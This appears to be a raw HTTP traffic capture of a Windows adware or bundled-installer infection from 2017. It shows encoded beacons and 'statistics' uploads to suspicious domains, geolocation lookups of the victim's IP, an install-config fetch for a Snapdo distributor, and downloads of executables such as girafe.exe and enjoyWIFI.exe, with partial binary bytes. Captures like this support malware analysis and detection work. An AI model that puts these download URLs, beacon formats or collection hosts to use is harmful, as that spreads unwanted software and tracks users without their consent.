Host: stats.utyuytjn.com
Content-Length: 1694
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024078093
0061341211191062391630470432080711072490250652140881271302152211591681
7324404906313115003706817008006601218713421501620719805002713117624001
5043110151162143165039211105202161193205052130108122003140074166047033
0850550490150541512180700381791721472080041810920191112300060702382420
0516403115511223202715315415716111920511324905201323014814515708614716
4241254099073134029113173081069043065018032063180205049080170005001214
1120290691411921360860131100371921111320801420211881410011370892210762
4620507718218419206914211016801316705110302706608102818617007410821815
0004155018116175057022167242043232111222003244139170153187194126205012
1351001781611730250060950090261161650822332430411400381430521322451100
2816908215207017204605511106817613423500219722004413323311709116010413
7124248160042158049201003017011039234048194137117054167054134052051148
1061670980512400240021760830141551170732442301300782211150502500990591
4802625316421125211821414002620220413619506508411413814509909311501823
2156059167149174196005100145156137007207190217118130128078117133025102
2252080440512112310382430620172040280151030951872310481871811412352241
0618109407724505220621617416100413420514313820303202007319404924901704
6045165079253028128004154006068030083140022101190231035070034030146121
116054170167040056230044224211087123145114200192070093159186242147
<<< skipped >>>
HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1934
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251841681190580530131341631531102430210
5003304813211509414909722615318420516120322515907200406913118316100800
6165160233241222172150087054137247037078212176102210128093081179117120
1100400671842531102071820041271891972421442542382032471011671330410970
9801503700608013524606020209116611105712906617718513822722714610020314
4099131246251101195034126179069103235105069015166152046074139125003112
0920380871891780241980881060592351690420060171411171442221282001671971
2904106617016414419904314815810808924315500523911625214605916418517422
3003229028187135061200036085113164167011001141188108019070115171040213
005109115179113167176150039000229080033240191163089050221088064032
<<< skipped >>>
HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840592082382010131942482160731
6418505117207912013208816009214905323600701402213710001816108114813104
9009223014179056219130026189227205048115004089212026194230147086075131
1540950452300602232301230840261801270631891830770481401870562230810890
9919307819515123614406619100314818615822814212514724711016718210621102
9021024171000135166228209020185029213047101043129165108054119218127133
1571871220462212162030360271651631402010942060702392511331760082381460
6123901119201604506610714200817422906401200920325223402812505724018509
7231052152138115154129168233151189049115157240221021158134219242017021
2072520020021740091830692120441921001581271372442150641701891262402471
5001316410304903001701123323920602305322412714124402810813715712702125
5099192218169237071240019129153085254172149176022020117189036072002140
2300622291720572000441551080512070321812362531010242291070941431761940
9722400424017019412211409602801911001517023302003219005715910806122004
7004159246163171053173"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 2414
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024218195
0331452171020880520661780471061350012222180701950152260421710480951690
3801715701814820819503719911823803612315115914224912102515512707504215
5121201147201189169118224009041226062242000162093117128172015246252141
2141711131052180511850131501310371762030582071850610380230221470661830
3604417211616901007524416903923103705612004021711610614014603315601215
0031190229205079005145238089215092035178044174225118155225045113071157
1260612230380000191031392200160290560750761970622082171220100930160701
1417110612206419325408512125025202812303001520406915409505015510118020
0231131047006059243045098154036051206142213149240090172109057237064151
0061130902431961022531730162041862021341511890070331380180632051462230
0222915113210805623723601307704123121804213310503605222224303905723920
4167052180009124177151081141227185010135191239197114051022058149000055
2071210431370372021721030361620492320040371020781291961790482460542261
1518615405309907107300423206413802815313619417809010512024313923921622
7071246089054127027008106206018124233003184056044177085040047177126203
0632470682040231391010080341120540490140832422051900760250591531531242
2611411819814900819014903619202710318910815220722602808506501000413518
3205070018238004169093034010025082155229028184050207005079030224000008
026179001022150185100092234250196144146246105145102249218138216160
<<< skipped >>>
HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 3902
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024007218
1870850732312381921131201431440541961191072422381141360422281101760771
1900005802618204011820125504911616020113412310611802707602208216700102
1116153212015103131014099244080243019001113097015044149218013049044058
1290002242351550221071501900902240630590740131911181050051730152040770
6116207104813910616023312702204409202013122606617108003108721618602110
0142139144106038032112102173006194234042102242252210065031230088119169
1580741171870782170690030302380150370661020690801611772361751280841691
6407413810824300220719812607611123805907601224807706107607622413605011
5109096101047024006147252026057136150018109235237206254072019215156128
2521992180431410980511030351311110820631932370140810302430030022050230
7406420308905003119009022822723901716017318711508422508105103619103922
1191235162158135058068076210096047128025204223190124190156041161007054
0001050232200511211060441222351301511571480360841372420990362440892082
3111017508217020719704825212306913924116601212617810107006615218709008
6174241010123059148092143061195213113065123116053153207246229078155119
2031262232102491732360721291772311370780681921240481141851321031030610
6414119305220917905216722002613513701005709109818118623705125320710101
1142057119159107174241069032022035170104115137227080255076076013069238
128137248151229237043122152062130109156025083206083195003011247160
<<< skipped >>>
HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:46 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1358
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024019151
1290412232011630680391640941910260260930272331191112541961482421262080
9912010022611407322909711019211910518122501603912217708500004304313717
9124105027145124152084024000188096028213194187209174167070156064218153
1460920530490161410500312131082141060541230711890752062331111792420671
3901601917112520503718608003214921323713119114600922701418615621220621
8231147067224133052065153047025207046012060124014167197067145059233136
0281081991380240150481221790561211001922392310312282032470631791710280
0623812311120700514108703316114911504500825109224707007415922419018806
2160170037121166075036042173212209106156084142118124039253109122094248
2161552532291521741850290791950151481851311230141572120820331160681740
5112213322903213512325108123121116017404721620006616819103005015306512
2159048211091004233220019242179021205184196064002238142124180212186232
2450260521440980730121972070240532002530520242460980681732091540490800
4812409609822116608314704711218513101812900722118203506025014409912303
5065058050136248057017039015007194019071195098251019141158174219078130
1170171250791721501522210052542340771201290230311701251011660610872150
88253209061064051246199078"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1406
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024016018
0670340950392060621031621381831201862462390940721560050280290090990642
0615000922901506120522001416603023011522315020117321417804609217505814
3148088233085068168032132089150242164211237160080047051072180126063119
1560421982202291041441681941422540821692060962551141810342091281772471
0224502815716301525400014617507305215914820119118810818013411725420508
9028230226174043031050105229115242075154134014077172157091242126047029
0750141111892551911120271740922171371771322461820601901002271942421640
0324917903223201212808201717019912025508220901905908204908620409505206
9094138200029086009203157065217026077051210222127052245008070245023091
1592121651601051132361222251370650380212200801421501802351651560501500
3407813106222705604311515810912514410202400304512224221304320511213205
0039240032012230089008136230072253036186086239080235235026166154054119
0750270870070031670891260121840530311030570930740431891152540880270921
9318807016310107403413317006919521903320800822408017705417417709712214
8018168178254008147197071097125151179027102221020198164144112160227234
0641710141951901540041201111691372492251242101810971941101142390000640
0923205320216615002016715402518806316015900623614604105322909914304102
2074"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1166
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540872520021982011011720091832440870072282200260892
3112919525100915715414007707507900211701007805400605623614004118814424
5239058107230142034041175152025016083043162229236081023110199073012084
1602112181390760260951781280481900732181591491341531112320050362111031
1720815717717320305321702722824604316418803401015205217117505207103723
0105028139109014077232089047197175046149232191255141170032146009003243
2370190441530320470181780350301052220870030770662252062160341241052121
2506817017825207203322122510509118119024424012113503113820417220509821
3031226117166109229065243146106161105205024082030099010051158141252184
2211150811761721822061421681961821101751891961972101791341720972381551
03093059141220093051251213010051108009116103"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1166
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540872520021982011011720091832440870072282200260892
3112919525100915715414007707507900211701007805400605623614004118814424
5239058107230142034041175152025016083043162229236081023110199073012084
1602112181390760260951781280481900732181591491341531112320050362111031
1720815717717320305321702722824604316418803401015205217117505207103723
0105028139109014077232089047197175046149232191255141170032146009003243
2370190441530320470181780350301052220870030770662252062160341241052121
2506817017825207203322122510509118119024424012113503113820417220509821
3031226117166109229065243146106161105205024082030099010051158141252184
2211150811761721822022402100761990402061180721390121811970231872301051
32220143099214029176146147105084075023055100"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840220872040150182351531891501
5008202407420100800515309920112522506303102112510118308912319915316106
2011023027211251096191061178155250184180226010017102182102116005017175
1911971282461480890750852150890622090721540482290541170341561612111361
1714104919020117615407103701921406515218104112819618814117200222717004
8142029114127104156123248020052011200199001069235096243135216162206224
1162521282361150611401402410040661670572532291600011621110330570450901
0207003409308803110105706710417419121622011318414620311200216012507807
9095014086060034135209042114147025042190113008017247187142139032168227
1192300800721970000670620600430052070841090940421912201670951430821090
2923109201123106816309225206206603708411615312211809313918111718224317
6161002062179117013101040243222063027105029111210000050166103179069244
1980910551620880472240850411520320032051021550420492381692070191601980
5910400620900115601712001813717703605311112703616311504316125302916302
2152074070192238099001"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1982
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251842362361720621690130242271290820292
1719114900121920413422604414522019923704818325419903816804812606220200
2226170066185119027191094240222069112172136133238106245085241109169106
0290311720990671091502022281950302261541731641532430881731590902080382
3218500607107605205213519201510514203009504719610610616909819222115504
3190040159216023067217118088005031079128149122062102227254064199018156
0111341101330450781771751040201201840250522552231161000750420110981930
6110205321403202802416124810811522020317009224909921306621907106317021
5173227045034234151069043007059074143079080165074184219153003151144202
042189228236219056120254185070214188128069231153078059035024141068
<<< skipped >>>
HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}....


POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1


Content-Type: application/json; charset=utf-8
dataType: json
Host: stats.utyuytjn.com
Content-Length: 1214
Expect: 100-continue


HTTP/1.1 100 Continue
....




{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330842170891601450782110120341760
2918904420117716819724221922502209210313221708313919420706907904720206
4163077219044084217023205096058050149181176096250030058116183132122216
0870560311550060540190340422232121680942091561251941890551640050011721
9217523611113225520108619505117419108705707517018421506202817118414522
8248156170048022033170242189125219206079134078050022065150054040186231
1231341000970680520872250650582030061962331920321252231452291290630132
3115616301800206416913603000703901614806811519721104800721921710103719
5121036056172062058001035052204242162244120115034036223154020079198048
1571481721142392360001860361500990031180451770680542412390131510352460
3025210816324824820700223508325321210720118718104206818610909822709401
8111065065117151221008218171037241217140239075160081125254053240089043
0141082531100110070512501860152510920771910821861731332522061491412440
3202817300609412010116521710617810801612613323001310807913412313411305
6218176031066189021095"}

HTTP/1.1 200 OK


Cache-Control: private
Content-Length: 10
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:47 GMT
{"d":"OK"}..



GET /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Sina
Date: Mon, 09 Oct 2017 10:14:07 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
Set-Cookie: INTDPOOL=cb85cb75f7eb9cc5f37b34f3a3b7fb7e;Path=/
DPOOL_LB7_HEADER: apollo219
1.-1.-1...............



GET /jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENEQ1RkUyNkFGOTQ2Nzg1OEU4NUU4QTJCN0U5RjhFQkU5NUZCODFGMEMxODUwNTc4OERDRjc1OEY0RjVDRDNCOUZF HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:03 GMT
Connection: close
Content-Length: 0



POST /temptrack/Store HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 360devtraking.website
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip


HTTP/1.1 100 Continue
....




order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqiQOTI/JyucIhVmFrb nx/
WkOVlt4iJXdyEREdrpXH9pdwqqyQfmQwgR/TgFYZ0Tmv6PxtnhIkVSq FiIdKzqqyuhpqT
ZXd3lq0qNT3U9XB2ssTdiUTjctIaoqD4s9D98EbsB2ufZ 5Rp9VKntv XUpAVc5LdhXh0q
VrPw0bakX5g=="

HTTP/1.1 200 OK


Server: nginx/1.10.1 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Mon, 09 Oct 2017 10:14:07 GMT
Content-Encoding: gzip
14........................0..



GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REJCQjlERkJGRUYzNkI1NDY5RkNEMDk4REFFNTZBQUNCRjFBMEEwMkZCMDhFRDBBN0IwRDZBRjc5MkJBRTE0QjM2QkNDMjBEMDI5NEQyMUM3Q0Y5RUM0RUQ1QTYzMEJGQUFGMUE3NEJCQTFFMDIzMjJBRTIxMEY1MUI3MjRGRDIxMTNCNDE1Nzc5ODUzQ0UyQ0Q4MUI3NkYyQ0Y5NjVEQkM= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:14:59 GMT
Connection: close
Content-Length: 0



GET /jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1RERBMDNBNzQ2REI4RUVEOTlEMDk0MTE5NjQyNTZCREVERTc1ODgxQjlDRTUxNUQwMDRERjFFOUUxQzQ5OURENERGMjAwNDUyODA2NThCRjhGNDUyOTVCRTNCNUY1MDk3QTFBMEJEMDIyNDZFNkIxQTgxMDdENTg1REQ4RDZCOTFC HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:04 GMT
Connection: close
Content-Length: 0



GET /anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzFFMDNDNkEwOTU2Njk4RjhCOEMyRjk5MTJFOTA4Rjk1REMzMEMyQUY0ODJBOUQ3MTg2MURCQTk3RDAwMkEyRTM4OTNGRDEzMDE5MzU0OTQyMjlDMDhBMzMxNzVDNDE3RUY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: jk.yeawindows.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:15:01 GMT
Connection: close
Content-Length: 0



GET /apdata/installers/auto/exe/girafe.exe HTTP/1.1
Host: cdn.piytrwd.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 09 Oct 2017 10:13:33 GMT
Keep-Alive: timeout=10
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: 1507541783
Cache-Control: max-age=86400
Content-Length: 2729472
Content-Type: application/octet-stream
X-HW: 1507544013.dop015.am4.t,1507544013.cds001.am4.c
Last-Modified: Mon, 09 Oct 2017 09:36:23 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........Y0GT8^.T8^.
T8^.Yj..*8^.Yj..q8^.Yj...8^.]@..Q8^.T8_..8^.....P8^.Yj..U8^.T8..U8^...
..U8^.RichT8^.........PE..L....B.Y.....................L......bY......
......@...........................*...........@.......................
..............<....P...5....................)..e......8............
...................@............................................text..
..~.......................... ..`.rdata...Q.......R..................@
..@.data....\.......4..................@....rsrc....5...P...6.........
.........@..@.reloc...e....)..f...@).............@..B.................
......................................................................
......................................................................
......................................................................
......................................................................
................................................;...h..K...5..Y.......
..........b8M..............;M..V...h..K...5..Y.............;M......h..
K...5..Y.............;M..v...h..K...5..Y.............;M..F...h..K..b5.
.Y...........j...;M..........j...;M..........j...;M..........j...;M...
.....`2M......h..K...5..Y.h..K...4..Y.h..K...4..Y.h..K...4..Y..l3M....
..h..K...4..Y.h.4M........$..K...4..Y.h..K...4..Y........@..4M...iG...
.5M.....5M.........5M.........5M.........5M......hx5M.....K...........
.....;.s.j.....K.3...................U.....S.].VW...M..33..K..}..M
<<< skipped >>>


GET /Update/CheckInstallConfig?deviceid=3815defc-8d53-7691-634e-7d5250b86812&distributer=APSnapdoAMRev&channelid=3&barcodeid=50027003&country=UA&encrypt=True HTTP/1.1
Host: updates.utyuytjn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json; charset=utf-8
Expires: Mon, 09 Oct 2017 10:14:45 GMT
Last-Modified: Mon, 09 Oct 2017 10:13:45 GMT
Vary: *
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:45 GMT
Content-Length: 278
[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","Count
ry":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url":"ht
tp://cdn.ijnewhb.com/apdata/installers/installer/installers-config/sna
pdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":""}]HT
TP/1.1 200 OK..Cache-Control: public, max-age=60..Content-Type: applic
ation/json; charset=utf-8..Expires: Mon, 09 Oct 2017 10:14:45 GMT..Las
t-Modified: Mon, 09 Oct 2017 10:13:45 GMT..Vary: *..Server: Microsoft-
IIS/8.5..X-AspNetMvc-Version: 5.0..X-AspNet-Version: 4.0.30319..X-Powe
red-By: ASP.NET..Date: Mon, 09 Oct 2017 10:13:45 GMT..Content-Length: 
278..[{"Distributer":"APSnapdoAMRev","ChannelID":"*","BarcodeID":"*","
Country":"*","Type":"InstallConfig","Version":"1.0.0.0","Name":"","Url
":"hXXp://cdn.ijnewhb.com/apdata/installers/installer/installers-confi
g/snapdo-ap/apsnapdoamrev/ic170817.xml","ApName":"Ronzap","RangeStr":"
"}]..



GET /apdata/installers/installer/installers-config/snapdo-ap/apsnapdoamrev/ic170817.xml HTTP/1.1
Host: cdn.ijnewhb.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache
Content-MD5: usysLlirjb9CcsmmYlN5Zw==
Content-Type: text/text
Date: Mon, 09 Oct 2017 10:13:46 GMT
Etag: 0x8D4E5515B4714EF
Last-Modified: Thu, 17 Aug 2017 09:21:35 GMT
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: bb90ae92-001e-0028-58e7-40b7d3000000
x-ms-version: 2009-09-19
Content-Length: 18912
0451172170521482400972540131681420280440702401300140371510261340590491
6705814003723022417509508516823313924109622002600009123912205202619515
0122048224212188161077052176172155067108191251021214178213193203148184
1372420651410160011131292230850851460481940851112401241961270611720460
1702401707211306019500414715515212921920804307522321716206620914614618
7251022064177129160206027116067223162200188025065009028216061177170133
1782242170821171530892301900050270161640630710812180342440500511990800
8218611508012420922203210514101119913900401507615719304918405113212206
1019129173226182194144155199255201218059039035075177136214036192039044
2241080342272051060591152321270951941210701491461361162440091731261620
1913823019121603024824521912313222601613424211224012008911806300423408
6212249061050170094162099177069070037008039081187095080151101197117084
1701750630921611731462391080550260941090670471162402231501270261820721
9417225224523100412804221118017921018722222424209719907212101003903500
4055242070216025238182004062253117241192160116034153215029181191038067
1660120910910212152261632141451370180070841190600161731071242470230771
4617024713802307415719507524523214405703306919203702103101110410512712
6003090054067046170143142060034217142115216193239120047056250028038116
1762200932090021850090342030450930940530421021151960850140871160121920
6517514304508017806425115320211713520411703914806619321714416914214914
5163149133078097178212200098029149154122138242212017193129205077067116
103201207076235152204213059081092044118223170223190043155018138118
<<< skipped >>>


GET /MaxMind.asmx/GetGeoInfo HTTP/1.1
Host: madmax.utyuytjn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 Oct 2017 10:13:44 GMT
Content-Length: 184
<?xml version="1.0" encoding="utf-8"?>..<string xmlns="http:/
/temptempuri.org/">194.242.96.218,UA,Ukraine,07,Kharkiv,,49.9808044
433594,36.2527008056641,0,0,Kharkivs'ka Oblast'</string>HTTP/1.1
 200 OK..Cache-Control: private, max-age=0..Content-Type: text/xml; ch
arset=utf-8..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X
-Powered-By: ASP.NET..Date: Mon, 09 Oct 2017 10:13:44 GMT..Content-Len
gth: 184..<?xml version="1.0" encoding="utf-8"?>..<string xml
ns="hXXp://temptempuri.org/">194.242.96.218,UA,Ukraine,07,Kharkiv,,
49.9808044433594,36.2527008056641,0,0,Kharkivs'ka Oblast'</string&g
t;..



GET /enjoyWiFi/enjoyWIFI.exe HTTP/1.1
Host: yeawindows.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 09 Oct 2017 04:38:57 GMT
Accept-Ranges: bytes
ETag: "4dca5e85b840d31:0"
Server: Microsoft-IIS/7.5
